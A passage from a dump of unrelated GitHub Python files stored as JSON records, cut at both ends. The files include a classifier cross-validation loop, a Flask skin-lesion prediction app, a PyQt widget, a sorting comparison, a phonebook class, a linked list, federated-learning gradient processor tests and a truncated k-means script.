KNN\r\nimport pandas as pd\r\nfrom sklearn import metrics as met\r\n\r\n\r\ndef training(concept,\r\n t_window = ['1&0.5','2&1','3&1.5'],\r\n methods = ['RF','SVM', 'MLP', 'KNN'],\r\n K=10):\r\n \r\n for cncpt in concept:\r\n print(cncpt)\r\n \r\n for twnd in t_window:\r\n print('--%s' % twnd) \r\n path = '%s//%s//' % (cncpt,twnd)\r\n #Each fold's accuracy is stored\r\n acc_k = []\r\n for k in range(1,K+1):\r\n print('-----Fold %d:' % k)\r\n \r\n #Training and testing sets are opened with pandas\r\n training_set = pd.read_csv('%sSelectedFeatures_%s_%s_train%d.csv'%(path,twnd,cncpt,k))\r\n testing_set = pd.read_csv('%sSelectedFeatures_%s_%s_test%d.csv'%(path,twnd,cncpt,k))\r\n \r\n #Training data set is split into inputs (X) and outputs (Y)\r\n training_set_X = training_set.drop(training_set.columns[-1],axis=1)\r\n training_set_Y = training_set[training_set.columns[-1]]\r\n \r\n #Testing data is split\r\n testing_set_X = testing_set.drop(testing_set.columns[-1],axis=1)\r\n expected_output = testing_set[testing_set.columns[-1]].values\r\n \r\n #Each method's accuracy is stored\r\n acc_method = []\r\n for method in methods:\r\n if method == 'RF':\r\n classifier = RndFC(n_estimators=100)\r\n elif method == 'SVM':\r\n classifier = svm.SVC(gamma='auto', kernel = 'poly')\r\n elif method == 'MLP': \r\n classifier = ffp()\r\n else:\r\n classifier = KNN()\r\n classifier.fit(training_set_X, training_set_Y)\r\n \r\n #The classifier is tested\r\n estimates = classifier.predict(testing_set_X)\r\n accuracy = met.accuracy_score(expected_output,estimates)\r\n print('-----------%s Accuracy: %f' % (method, accuracy))\r\n acc_method.append(accuracy)\r\n acc_k.append(acc_method)\r\n print('---%s scores:' % twnd)\r\n for i in range(0,len(methods)):\r\n avg_accuracy = 0\r\n for k in range(0,K):\r\n avg_accuracy += acc_k[k][i]\r\n avg_accuracy = avg_accuracy/K\r\n print('------%s Avg. 
Accuracy: %f' %(methods[i],avg_accuracy))\r\n\r\ndef main():\r\n    concept = []\r\n    training(concept)\r\n    print('\\nEnd of task')\r\n\r\n    \r\nif __name__==\"__main__\":\r\n    main()\r\n","repo_name":"jpnm561/HAR-UP","sub_path":"K-crossValidation/Training_function.py","file_name":"Training_function.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"83"} +{"seq_id":"1457277416","text":"from __future__ import division, print_function\n# coding=utf-8\nimport sys\nimport os\nimport PIL\nimport glob\nimport re\nimport numpy as np\nimport gdown\n\n\n# Keras\nfrom keras.models import load_model\nfrom keras.preprocessing import image\nfrom PIL import Image\n\n# Flask utils\nfrom flask import Flask, redirect, url_for, request, render_template, send_from_directory\nfrom werkzeug.utils import secure_filename\n\n\n# Define a flask app\napp = Flask(__name__)\napp.config['UPLOAD_PATH'] = 'uploads'\n\n# Model saved with Keras model.save()\nurl = 'https://drive.google.com/uc?id=1Ql7jwGUl1EeYOoPAxs7u3FUNrHgU9Zlz'\noutput = 'ful_skin_cancer_model.h5'\ngdown.download(url, output, quiet=False)\nMODEL_PATH = 'Virtual_doc/ful_skin_cancer_model.h5'\n\n# Load your trained model\nmodel = load_model(MODEL_PATH)\nmodel.make_predict_function()\nprint('Model loaded. Start serving...')\nprint('Model loaded. Check http://127.0.0.1:5000/')\n\n\ndef model_predict(img_path, model):\n    x=image.load_img(img_path)\n    x=x.resize((224,224))\n    x = np.expand_dims(x, axis=0)\n    x=np.asarray(x)\n    preds = model.predict(x)\n    return preds\n\n\n@app.route('/', methods=['GET'])\ndef index():\n    # Main page\n    return render_template('skin.html')\n    \n\n\n@app.route('/home', methods=['GET', 'POST'])\ndef home():\n    if request.method == 'POST':\n        # Get the file from post request\n        file = request.files['skinpic']\n\n        # Save the file to ./uploads\n        basepath = os.path.dirname(__file__)\n        filename = secure_filename(file.filename)\n        file_path = os.path.join(\n            basepath, 'static', 'uploads', filename)\n        file.save(file_path)\n        \n\n        # Make prediction\n        preds = model_predict(file_path, model)\n        lesion_type_dict = {\n            'nv': 'Melanocytic nevi',\n            'mel': 'Melanoma',\n            'bkl': 'Benign keratosis-like lesions ',\n            'bcc': 'Basal cell carcinoma',\n            'akiec': 'Actinic keratoses',\n            'vasc': 'Vascular lesions',\n            'df': 'Dermatofibroma'\n        }\n        nv = round(round(preds[0,0], 5)*100, 2)\n        mel = round(round(preds[0,1], 5)*100, 2)\n        bkl = round(round(preds[0,2], 2)*100, 2)\n        bcc = round(round(preds[0,3], 2)*100, 2)\n        akiec = round(round(preds[0,4], 2)*100, 2)\n        vasc = round(round(preds[0,5], 2)*100, 2)\n        df = round(round(preds[0,6], 2)*100, 2)\n        result = np.array([nv, mel, bkl, bcc, akiec, vasc, df])\n\n\n        # Process your result for human\n        # pred_class = preds.argmax(axis=-1)            # Simple argmax\n        # pred_class = decode_predictions(preds, top=1)   # ImageNet Decode\n        # result = str(pred_class[0][0][1])               # Convert to string\n        #return result\n        return render_template('predict.html', data=result)\n    \n    \n\n@app.route('/find', methods=['POST'])\ndef find():\n    query=request.form.get('query')\n    query= \"skin clinics in \" + query\n    s = []\n\n    try: \n        from googlesearch import search \n    except ImportError: \n        print(\"No module named 'google' found\") \n    \n    # to search \n    for j in search(query, tld=\"co.in\", num=5, stop=6, pause=2): \n        s+=[j]\n    a=s[0]\n    b=s[1]\n    c=s[2]\n    d=s[3]\n    e=s[4]\n    g=s[5]\n    c=np.array([a, b, c, d, e, g])\n    return render_template('blank.html', data=c)\n    \n    \n@app.route('/uploads/<filename>')\ndef upload(filename):\n    
return send_from_directory(app.config['UPLOAD_PATH'], filename) \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"devadutt-github/Virtual_doc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70246452431","text":"# -*- encoding:utf-8 -*-\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom src.Networking import game_user_manager\n\nclass GameHallRankList(QListView):\n def __init__(self, parent=None):\n QListView.__init__(self, parent)\n self.setStyleSheet(\n '''\n border-image: url(:btn_bg);\n background-repeat: no-repeat;\n ''')\n\n self.model = QStandardItemModel()\n self.setModel(self.model)\n self.setWordWrap(True)\n self.setUniformItemSizes(True)\n self.setGridSize(QSize(self.rect().width(), 30))\n self.setFont(QFont(\"Microsoft YaHei\", 10))\n self.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.setFocusPolicy(Qt.NoFocus)\n self.setSelectionMode(QAbstractItemView.NoSelection)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setAcceptDrops(True)\n\n self.connect(game_user_manager.GameUserManager(), SIGNAL(\"refreshRank\"),\n self.refresh)\n\n def refresh(self):\n self.model.clear()\n rank = 0\n for user in game_user_manager.GameUserManager().userScore:\n if 'uid' in user and 'score' in user:\n text = user['uid'] + ' : ' + str(user['score'])\n item = QStandardItem(text)\n item.setTextAlignment(Qt.AlignCenter)\n item.setFont(QFont(50))\n if rank == 0:\n item.setForeground(QBrush(QColor(255, 0, 0)))\n if rank == 1:\n item.setForeground(QBrush(QColor(200, 0, 0)))\n if rank == 2:\n item.setForeground(QBrush(QColor(150, 0, 0)))\n self.model.appendRow(item)\n rank += 1\n","repo_name":"caiwb/5In1RowClient","sub_path":"src/GameHall/game_hall_rank_list.py","file_name":"game_hall_rank_list.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"40270902670","text":"# -*- mode: python ; coding: utf-8 -*-\nfrom PyInstaller.utils.hooks import collect_submodules\nimport glob\n\nblock_cipher = None\n\nhidden_battlesim = collect_submodules('sbbbattlesim')\nhidden_tracker = [ file[2:].replace(\"/\", \".\").replace(\"\\\\\", \".\").replace(\".py\", \"\") for file in glob.glob(\"./sbbtracker/lang/lang_*.py\") ]\n\nprint(collect_submodules('./sbbtracker/lang/'))\na = Analysis(['sbbtracker/application.py'],\n pathex=[],\n binaries=[],\n datas=[],\n hiddenimports=hidden_battlesim+hidden_tracker,\n hookspath=[],\n hooksconfig={},\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\na.datas += [('assets/sbbt.ico', 'assets/sbbt.ico', 'DATA')]\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts, \n [],\n exclude_binaries=True,\n name='SBBTracker',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=False,\n disable_windowed_traceback=False,\n target_arch=None,\n codesign_identity=None,\n entitlements_file=None , icon='assets/sbbt.ico')\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas, \n strip=False,\n upx=True,\n upx_exclude=[],\n 
name='SBBTracker')\n","repo_name":"SBBTracker/SBBTracker","sub_path":"SBBTracker.spec","file_name":"SBBTracker.spec","file_ext":"spec","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"83"} +{"seq_id":"44088451301","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\ndef swap(arr, i, j):\n temp = arr[i]\n arr[i] = arr[j]\n arr[j] = temp\n\nclass Sort(object):\n counts = 0\n\n def insertionSort(self, x):\n arr = np.array(x)\n for i in range(1, x.size):\n j = i\n while j >= 1 and arr[j] < arr[j-1]:\n Sort.counts += 1\n swap(arr, j, j-1)\n j = j - 1\n return arr\n \n def mergeSort(self, arr):\n result = np.array([])\n if arr.size < 5:\n result = self.insertionSort(np.array(arr))\n else:\n result = np.zeros(arr.size)\n halfway = int(arr.size / 2)\n list1 = np.array(arr[0:halfway])\n list2 = np.array(arr[halfway::])\n list1 = self.mergeSort(list1)\n list2 = self.mergeSort(list2)\n i1 = 0\n i2 = 0\n i = 0\n while i1 < list1.size and i2 < list2.size:\n if list1[i1] < list2[i2]:\n result[i] = list1[i1]\n i1 += 1\n else:\n result[i] = list2[i2]\n i2 += 1\n i += 1\n Sort.counts += 1\n while i1 < list1.size:\n result[i] = list1[i1]\n i1 += 1\n i += 1\n Sort.counts += 1\n while i2 < list2.size:\n result[i] = list2[i2]\n i2 += 1\n i += 1\n Sort.counts += 1\n return result\n\"\"\"\ns = Sort()\nnp.random.seed(0)\n\nnum_per_size = 50\nsizes = []\nsteps1 = []\nsteps2 = []\nfor n in range(10, 400):\n print(n)\n for i in range(num_per_size):\n sizes.append(n)\n x = np.random.randint(0, n*2, n)\n x1 = s.insertionSort(x)\n steps1.append(Sort.counts)\n Sort.counts = 0\n x2 = s.mergeSort(x)\n steps2.append(Sort.counts)\n x = np.sort(x)\n if not np.allclose(x, x1):\n print(\"insertion sort failed\")\n if not np.allclose(x, x2):\n print(\"Merge sort failed\")\n\njson.dump({'sizes':sizes, 'steps1':steps1, 'steps2':steps2}, open(\"steps.txt\", \"w\"))\n\"\"\"\nres = json.load(open(\"steps.txt\"))\nsizes, steps1, steps2 = res['sizes'], res['steps1'], res['steps2']\n\nsizes = np.array(sizes)\nsteps1 = np.array(steps1)\nsteps2 = np.array(steps2)\n\nplt.figure(figsize=(12, 8))\nplt.scatter(steps1, steps2, c=sizes, cmap='afmhot')\nplt.xlabel(\"Insertion Sort Steps\")\nplt.ylabel(\"Merge Sort Steps\")\nplt.title(\"Merge Sort / Insertion Sort Comparison\")\nplt.colorbar()\nax = plt.gca()\nax.set_facecolor((0.6, 0.6, 0.6))\nplt.savefig(\"Timings.svg\", bbox_inches='tight')","repo_name":"Ursinus-CS173-S2020/CoursePage","sub_path":"Modules/Lab11_Recursion/Sorting.py","file_name":"Sorting.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29837966484","text":"import sys\nimport fileinput\n\n\nclass Guide:\n \"\"\"Объект справочник.\n\n выполняет команды взаимодействующие с txt файлом/бд:\n add_contact(self.params) - добавляет запись о кнтакте в бд;\n get_contact - возвращает список контактов;\n edit_contact(self.params) - находит контакт, который нужно изменить\n по id и меняет значения у параметров переданых в params;\n find_contact(self.params) - находит контакт по указанным параметрам и\n выводит его в консоль;\n сохраняются данные вследующем виде:\n id/surname/name/company/privat_phone/work_phone\n \"\"\"\n def __init__(self, input_data):\n self.params = input_data\n\n def add_contact(self) -> None:\n \"\"\"Функция сохранения контакта в справочник.\n\n принимает на вход данные контакта и сохраняет их в бд\n \"\"\"\n with 
open('./contact_base.txt', 'r+') as file:\n index = len(file.readlines())\n file.write(\n f'{index}/{self.params[\"surname\"]}/{self.params[\"name\"]}/'\n f'{self.params[\"middle_name\"]}/{self.params[\"company\"]}/'\n f'{self.params[\"privat_phone\"]}/{self.params[\"work_phone\"]}\\n'\n )\n return 'Контакт успешно сохранен!'\n\n def get_contact(self):\n \"\"\"Метод возвращающий все данные из справочника.\"\"\"\n with open('./contact_base.txt', 'r') as file:\n data = file.read()\n return data\n\n def edit_contact(self) -> None:\n \"\"\"Функция редактирования для справочника.\n\n принимает на вход словарь вида: параметр-значение,\n меняет все выбранные поля и выводит сообщение об успешном\n выполнении команды.\n \"\"\"\n param_indexes = {\n 'surname': 1,\n 'name': 2,\n 'middle_name': 3,\n 'company': 4,\n 'private_phone': 5,\n 'work_phone': 6\n }\n if len(self.params) > 1:\n item_id = self.params.pop('id')\n for line in fileinput.input('./contact_base.txt', inplace=1):\n line = line.split('/')\n if line[0] == item_id:\n for param, new_value in self.params.items():\n line[param_indexes[param]] = new_value\n sys.stdout.write('/'.join(line))\n return 'Данные успешно обновлены'\n else:\n return 'Никаких изменений применено не было.'\n\n def find_contact(self):\n \"\"\"Метод поиска контактов по параметрам.\"\"\"\n with open('./contact_base.txt', 'r') as file:\n for line in file.readlines():\n if set(self.params).issubset(line.split('/')):\n return line\n else:\n return 'Данные с указанными значениями не найдены'\n\n\ndef command_manager(command, values={}):\n try:\n print(getattr(Guide(values), command)())\n except KeyError as exception:\n print(f'Данное/ые значение/я отсутствует: {exception}')\n except AttributeError:\n print('Эта комманда не поддерживается.')\n\n\nif __name__ == '__main__':\n while True:\n command, *values = input().split(' ')\n if command == 'exit':\n break\n try:\n dict_values = dict(value.split('=') for value in values)\n command_manager(command, dict_values)\n except ValueError:\n print(\n 'Данные указаны неверно, тестовый пример:'\n 'add_contact name=value surname=value middle_name=value'\n 'company=value privat_phone=value work_phone=value'\n )\n","repo_name":"Grindelwaldoff/task_interview_effective_mobile","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27585164023","text":"import pytesseract\nimport sys\nfrom glob import glob\nimport os\nfrom os.path import basename\n\ndef image_ocr(image_path, output_txt_file_name):\n # Configuration details for psm given by the command: \n # tesseract --help-psm\n image_text = pytesseract.image_to_string(image_path, lang='eng+ces', config='--psm 6')\n with open(output_txt_file_name, 'w+', encoding='utf-8') as f:\n f.write(image_text)\n\ndef main():\n inputdir = sys.argv[1]\n outputdir = sys.argv[2]\n for input_filename in glob(inputdir + '/*.png'):\n print(input_filename)\n filename = basename(input_filename)\n output_filename = '{outputdir}{sep}{filename}'.format(outputdir=outputdir \n , sep=os.sep\n , filename=filename.replace('.png','.txt')) \n image_ocr(input_filename, output_filename)\n\nif __name__ == '__main__':\n main()","repo_name":"nickynicolson/index-CGE-world-collections","sub_path":"pytesseractwrapper.py","file_name":"pytesseractwrapper.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} 
+{"seq_id":"28868767556","text":"# 1,2,3\n# [[1,2],[2,3]]\n[0.5, 0.3]\n\ndef find_path(start, end, paths, probs):\n queue_nodes = [start]\n node_edges = {}\n # O(m)\n for i in range(len(paths)):\n first = paths[i][0]\n second = paths[i][1]\n if first in node_edges:\n node_edges[first].append(i)\n else:\n node_edges[first] = [i]\n if second in node_edges:\n node_edges[second].append(i)\n else:\n node_edges[second] = [i]\n\n res = []\n queue_edges = []\n # for node in queue_nodes:\n queue_edges = node_edges[start]\n while len(queue_nodes) != 0:\n vals = [probs[i] for i in queue_edges]\n min_val = max(vals)\n min_ind = vals.index(min_val)\n queue_edges.remove(queue_edges[min_ind])\n vals.remove(min_val)\n\n remove_path_ind = queue_edges[min_ind]\n remove_path = paths[remove_path_ind]\n \n res.append(remove_path)\n if remove_path[0] in queue_nodes:\n queue_nodes.remove(remove_path[0])\n queue_edges.append(node_edges[remove_path[1]])\n elif remove_path[1] in queue_nodes:\n queue_nodes.remove(remove_path[1])\n queue_edges.append(node_edges[remove_path[0]])\n\n if remove_path[1] == end or remove_path[0] == end:\n break\n return res\n\nif __name__ == '__main__':\n\n paths = [[1,2],[1,3],[1,4],[2,4],[3,4]]\n probs = [0.2, 0.5,0.4,0.5,0.1]\n res = find_path(1,4,paths, probs)\n print(res)","repo_name":"AllenLiuX/My-LeetCode","sub_path":"temp/cycle.py","file_name":"cycle.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20824128708","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\nclass LinkedList:\n def __init__(self):\n self.head=None\n def append(self,data):\n new_node=Node(data)\n if(self.head==None):\n self.head=new_node\n return\n else:\n last_node=self.head\n while last_node.next:\n last_node=last_node.next\n last_node.next=new_node\n def print_list(self):\n head_node=self.head\n while head_node:\n print(head_node.data)\n head_node=head_node.next\nllist = LinkedList()\nllist.append(\"A\")\nllist.append(\"B\")\nllist.append(\"C\")\nllist.append(\"D\")\n\n\nllist.print_list() \nllist.append(87)\nllist.append(80)\nllist.print_list()\n","repo_name":"narayanaly/python_learning","sub_path":"single_linked_list_insertion.py","file_name":"single_linked_list_insertion.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9168713787","text":"import gc\nimport sys\nfrom torch.autograd import Variable\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler\ntorch.backends.cudnn.benchmark = True\n\nimport dataset\nfrom models.AlexNet import *\nfrom models.ResNet import *\nfrom models.SENet import *\nfrom tqdm import tqdm\nimport platform\n\nimport torchvision.models as models\n# resnet18 = models.resnet18()\n# alexnet = models.alexnet()\n# vgg16 = models.vgg16()\n# squeezenet = models.squeezenet1_0()\n# densenet = models.densenet161()\n# inception = models.inception_v3()\n\n\n# Parameters\nnumber_of_epochs = 500\noutput_period = 100\nsize_of_batch = 50\nmodel_to_use = senet154()\n\ndef run(num_epochs, out_period, batch_size, model):\n # setup the device for running\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = model.to(device)\n\n train_loader, val_loader = dataset.get_data_loaders(batch_size)\n num_train_batches = len(train_loader)\n\n criterion = nn.CrossEntropyLoss().to(device)\n # 
optimizer is currently unoptimized\n # there's a lot of room for improvement/different optimizers\n # optimizer = optim.SGD(model.parameters(), lr=1e-3, nesterov=True)\n optimizer = optim.Adam(model.parameters(), lr=1e-3)\n # optimizer = optim.Nesterov(model.parameters(), lr=1e-3)\n\n # printAccuracy(train_loader, device, model, \"TRAINSET\", 1)\n\n epoch = 1\n while epoch <= num_epochs:\n running_loss = 0.0\n for param_group in optimizer.param_groups:\n param_group['lr'] = max(param_group['lr'] * 0.97, 1e-4)\n tqdm.write('Current learning rate: ' + str(param_group['lr']))\n model.train()\n\n for batch_num, (inputs, labels) in enumerate(tqdm(train_loader), 1):\n inputs = inputs.to(device)\n labels = labels.to(device)\n # print(labels)\n # print(labels.size())\n\n optimizer.zero_grad()\n outputs = model(inputs)\n # outputs, aux = model(inputs)\n # print(outputs.size())\n # print(torch.topk(outputs,5))\n # top5 = torch.topk(outputs,5)[1]\n # top52 = torch.topk(outputs,5)[0]\n # for i in range(len(inputs)):\n # print(\"\\n\\nyooooooooo\", i, \"\\n\\n\\n\", labels[i].item(),\"\\n\", top5[i], top52[i])\n # print(top5[i][0])\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n running_loss += loss.item()\n\n if batch_num % out_period == 0:\n tqdm.write('[%d:%.2f] loss: %.3f' %\n (epoch, batch_num * 1.0 / num_train_batches,\n running_loss / out_period))\n running_loss = 0.0\n gc.collect()\n\n gc.collect()\n # save after every epoch\n torch.save(model.state_dict(), \"models/model.%d\" % epoch)\n\n # Calculate classification error and Top-5 Error\n # on training and validation datasets here\n model.eval()\n try:\n printAccuracy(train_loader, device, model, \"TRAINSET\", epoch)\n printAccuracy(val_loader, device, model, \"VALSET\", epoch)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n pass\n\n\n gc.collect()\n epoch += 1\n\ndef printAccuracy(loader, device, model, name, epoch, max_iters=10000):\n num1 = 0\n num5 = 0\n total = 0\n iterator = tqdm(loader)\n for (inputs, labels) in iterator:\n inputs = inputs.to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n top5 = torch.topk(outputs, 5)[1]\n # top1 = torch.topk(outputs,1)[1]\n for i in range(len(inputs)):\n # print(\"\\nlabel:\", labels[i].item(),\"\\nTop 5:\", top5[i])\n top1 = top5[i][0]\n num1 += 1 if labels[i].item() == top1.item() else 0\n num5 += 1 if labels[i].item() in top5[i] else 0\n total += 1\n if total > max_iters:\n iterator.close()\n break\n tqdm.write(\"{} {} TOP 1: {}\".format(epoch, name, num1/total))\n tqdm.write(\"{} {} TOP 5: {}\".format(epoch, name, num5/total))\n\n\nif __name__ == '__main__' and platform.system() == \"Windows\":\n tqdm.write('Starting training')\n run(number_of_epochs, output_period, size_of_batch, model_to_use)\n tqdm.write('Training terminated')\nelif platform.system() != \"Windows\":\n tqdm.write('Starting training NOTWINDOWS')\n run(number_of_epochs, output_period, size_of_batch, model_to_use)\n tqdm.write('Training terminated')\n","repo_name":"amrahm/6819Miniplaces","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12390881873","text":"import collections\n\nfrom jax import numpy as jnp\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom multi_epoch_dp_matrix_factorization.dp_ftrl.centralized import gradient_processors\n\n\ndef _build_no_privacy_scalar_tree_agg(clip_norm=1.0):\n record_specs 
= tf.TensorSpec(shape=[], dtype=tf.float32)\n aggregator = tff.aggregators.DifferentiallyPrivateFactory.tree_aggregation(\n noise_multiplier=0.0,\n # Our implementation only passes *one* value through to the\n # aggregator, and does not want any normalization inside the aggregator.\n clients_per_round=1,\n l2_norm_clip=clip_norm,\n record_specs=record_specs,\n noise_seed=0,\n use_efficient=True,\n )\n return aggregator.create(tff.to_type(tf.float32))\n\n\nclass GradientProcessorsTest(tf.test.TestCase):\n\n def test_noprivacy_processor_builds_and_runs(self):\n num_microbatches = 10\n grad_processor = gradient_processors.NoPrivacyGradientProcessor()\n state = grad_processor.init()\n batched_grads = jnp.array([1.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, 1.0)\n\n def test_constructs_and_runs_from_tree_aggregator(self):\n num_microbatches = 10\n aggregator = _build_no_privacy_scalar_tree_agg()\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=1.0\n )\n state = grad_processor.init()\n batched_grads = jnp.array([1.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, 1.0)\n\n def test_constructs_and_runs_tree_agg_with_model_structure(self):\n num_microbatches = 10\n record_specs = collections.OrderedDict(\n a=tf.TensorSpec(shape=[100, 100], dtype=tf.float32),\n b=tf.TensorSpec(shape=[100], dtype=tf.float32),\n )\n factory = tff.aggregators.DifferentiallyPrivateFactory.tree_aggregation(\n noise_multiplier=0.0,\n clients_per_round=1,\n l2_norm_clip=1.0,\n record_specs=record_specs,\n noise_seed=0,\n use_efficient=True,\n )\n aggregator = factory.create(tff.to_type(record_specs))\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=1.0\n )\n state = grad_processor.init()\n # Jax returns our per-example gradients as dicts, so we test against this\n # here.\n batched_grads = dict(\n a=jnp.array([jnp.ones(shape=[100, 100])] * num_microbatches),\n b=jnp.array([jnp.ones(shape=[100])] * num_microbatches),\n )\n # We compute the l2 norm of each 'per-example' gradient; since the clipping\n # norm is 1.0, dividing by this will yield the per-element expected value of\n # the result.\n argument_l2_norm = (100**2 + 100) ** 0.5\n expected_result = dict(\n a=jnp.array(jnp.ones(shape=[100, 100]) / argument_l2_norm),\n b=jnp.array(jnp.ones(shape=[100])) / argument_l2_norm,\n )\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n self.assertAllClose(grad_estimate, expected_result)\n\n def test_aggregator_clips_and_sums(self):\n num_microbatches = 10\n clip_norm = 0.5\n aggregator = _build_no_privacy_scalar_tree_agg(clip_norm=clip_norm)\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=clip_norm\n )\n state = grad_processor.init()\n batched_grads = jnp.array([2.0] * num_microbatches)\n state, grad_estimate = grad_processor.apply(state, batched_grads)\n # The incoming values should have been clipped and then averaged.\n self.assertAllClose(grad_estimate, clip_norm)\n\n def test_only_clips_values_over_norm(self):\n num_microbatches = 10\n clip_norm = 0.5\n aggregator = _build_no_privacy_scalar_tree_agg(clip_norm=clip_norm)\n grad_processor = gradient_processors.DPAggregatorBackedGradientProcessor(\n aggregator, l2_norm_clip=clip_norm\n )\n state = grad_processor.init()\n batched_grads = 
jnp.array(\n        [0.25] * (num_microbatches // 2) + [2.0] * (num_microbatches // 2)\n    )\n    state, grad_estimate = grad_processor.apply(state, batched_grads)\n    expected_mean = (0.25 + 0.5) / 2\n    # The incoming values should have been clipped and then averaged.\n    self.assertAllClose(grad_estimate, expected_mean)\n\n\nif __name__ == '__main__':\n  tf.test.main()\n","repo_name":"google-research/federated","sub_path":"multi_epoch_dp_matrix_factorization/dp_ftrl/centralized/gradient_processors_test.py","file_name":"gradient_processors_test.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":610,"dataset":"github-code","pt":"83"} +{"seq_id":"30969399150","text":"album = [(\"Welcome to my Nightmare\", \"Alice Cooper\", 1975),\n         (\"Bad Company\", \"Bad Company\", 1974),\n         (\"Nightflight\", \"Budgie\", 1981),\n         (\"More Mayhem\", \"Imelda May\", 2011),\n         (\"Ride the Lightning\", \"Metallica\", 1984),\n         ]\n# if the tuple parentheses were removed, the items would flatten into one list and len(album) would be 15\nprint(len(album))\nfor alb in album:\n    print(\"Album: {}, Artist: {}, Year: {}\"\n          .format(alb[0],alb[1],alb[2]))\n# or\nfor name,artist,year in album:\n    print(\"Album: {}, Artist: {}, Year: {}\"\n          .format(name,artist,year))\n","repo_name":"danielosibodu/PythonProjects","sub_path":"tuples_nested.py","file_name":"tuples_nested.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24306947028","text":"text = \"All smiles, I know what it takes to fool this town I'll do it 'til the sun goes down And all through the nighttime Oh, yeah Oh, yeah, I'll tell you what you wanna hear Leave my sunglasses on while I shed a tear It's never the right time Yeah, yeah \"\nprint(text.split())\nword_count = { }\nfor word in text.split():\n    if word in word_count:\n        word_count[word]+=1\n    else:\n        word_count[word] =1\n\n\nword_count0 = { }\nfor word in text.lower().split():\n    if word in word_count0:\n        word_count0[word]+=1\n    else:\n        word_count0[word] =1\n","repo_name":"GK3077/Lyric-Analyzer","sub_path":"lyric-analyzer.py","file_name":"lyric-analyzer.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40852943425","text":"# K-means ++\n\n# casual python implementation of k-means ++\n\nimport numpy as np\nimport random\nimport math\n\ndatafile = \"/Users/tunder/booknlp/normalizedcharacters.tsv\"\n\nwith open(datafile, encoding='utf-8') as f:\n    filelines = f.readlines()\n\nterms = dict()\ntermindices = dict()\ndocuments = dict()\ndocindices = dict()\ndoccounter = 0\ntermcounter = 0\n\nthrottle = 1000000\n\nfor line in filelines[0:throttle]:\n    line = line.rstrip()\n    fields = line.split('\\t')\n\n    doc = fields[0]\n    term = fields[1]\n\n    if doc not in docindices:\n        docindices[doc] = doccounter\n        documents[doccounter] = doc\n        doccounter += 1\n\n    if term not in termindices:\n        termindices[term] = termcounter\n        terms[termcounter] = term\n        termcounter += 1\n\nD = doccounter\nV = termcounter\n\ntermdoc = np.zeros((V, D), dtype = 'float64')\n\nfor line in filelines[0:throttle]:\n    line = line.rstrip()\n    fields = line.split('\\t')\n\n    docidx = docindices[fields[0]]\n    termidx = termindices[fields[1]]\n    count = float(fields[2])\n\n    termdoc[termidx, docidx] = count\n\n\nfor i in range(D):\n    termdoc[ : , i] = termdoc[ : , i] / np.sum(termdoc[ : , i])\n\n\ndef docvector(docidx):\n    global termdoc\n    return termdoc[ : , docidx]\n\ndef 
